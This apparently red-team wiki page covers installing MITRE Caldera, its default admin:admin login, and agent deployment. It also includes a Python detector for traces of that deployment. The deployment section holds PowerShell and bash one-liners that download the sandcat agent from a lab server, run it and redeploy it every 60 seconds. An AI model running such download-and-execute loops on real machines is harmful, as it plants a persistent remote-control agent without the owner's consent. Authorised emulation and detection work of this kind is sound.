
Caldera

Install Caldera

Ensure Docker is installed first. Run the following as root:

cd /opt
sudo git clone https://github.com/mitre/caldera.git --recursive
cd caldera
sudo ./install.sh --kali

Run Caldera

cd /opt/caldera
source calderaenv/bin/activate
python server.py

Then browse to http://127.0.0.1:8888 and log in with admin:admin

Deploy Agent

Windows

$url="http://192.168.120.135:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.120.135:8888 -group my_group;
OR
while($true) {$url="http://192.168.120.135:443/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://192.168.120.135:443 my_group; sleep 60}

Linux

while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done
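
For the detection side of the lab, the one-liners above leave recognizable traces in process command-line logs: the /file/download endpoint, the "file" header naming sandcat, the drop paths, the agent's launch arguments and the 60-second redeploy loop. The following is an added example, not part of the original page or of Caldera itself; the (host, command line) log shape, the indicator names, the two-indicator threshold and the 192.0.2.10 sample address are assumptions made for illustration.

```python
import re

# Indicators derived from the deployment one-liners shown on this page.
INDICATORS = {
    "download_endpoint": re.compile(r"""https?://[^\s'";]+/file/download""", re.I),
    "sandcat_file_header": re.compile(r"""file["']?\s*[:,]\s*["']?sandcat""", re.I),
    "agent_drop_path": re.compile(r"(C:\\Users\\Public\\|/tmp/)sandcat[\w.-]*", re.I),
    "agent_launch_args": re.compile(
        r"sandcat[\w.-]*\s+(-server\s+)?https?://\S+\s+(-group\s+)?\w+", re.I),
    "redeploy_loop": re.compile(
        r"while\s*(\(\s*\$true\s*\)|true\s*;).*sleep\s+\d+", re.I | re.S),
}

def score(cmdline):
    """Return the sorted names of the indicators found in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))

def triage(events, threshold=2):
    """Return (host, hits) for events that match at least `threshold` indicators.

    A single indicator (any /file/download URL, any sleep loop) is too common
    to alert on, so the default requires two to co-occur.
    """
    flagged = []
    for host, cmdline in events:
        hits = score(cmdline)
        if len(hits) >= threshold:
            flagged.append((host, hits))
    return flagged

# Constructed sample process-creation records (host, command line).
SAMPLE_EVENTS = [
    ("WS01", r'powershell.exe -c $wc=New-Object System.Net.WebClient;'
             r'$wc.Headers.add("file","sandcat.go");'
             r'$wc.DownloadFile("http://192.0.2.10:8888/file/download",'
             r'"C:\Users\Public\sandcat.exe")'),
    ("WS01", r'C:\Users\Public\sandcat.exe -server http://192.0.2.10:8888 -group my_group'),
    ("web01", "bash -c while true; do curl -sk -X POST -H 'file:sandcat-linux' "
              "http://192.0.2.10:8888/file/download > /tmp/sandcat-linux && "
              "chmod +x /tmp/sandcat-linux && "
              "/tmp/sandcat-linux http://192.0.2.10:8888 my_group; sleep 60; done"),
    ("dev02", "curl -s https://files.example.org/file/download -o /tmp/report.pdf"),
    ("dev02", "while true; do date; sleep 60; done"),
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: possible Caldera sandcat deployment ({', '.join(hits)})")
```

The indicators match only the default names and paths used on this page; a renamed agent or a different drop path will not be caught by them.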

Understanding Caldera


Last updated 5 years ago


This graphic created by Adam Mashinchi

Presentation from Erik van Buggenhout: https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera

Caldera YouTube Playlist: https://www.youtube.com/playlist?list=PLkTApXQou_8KFTzR7KqDJh-ndMO39PYnB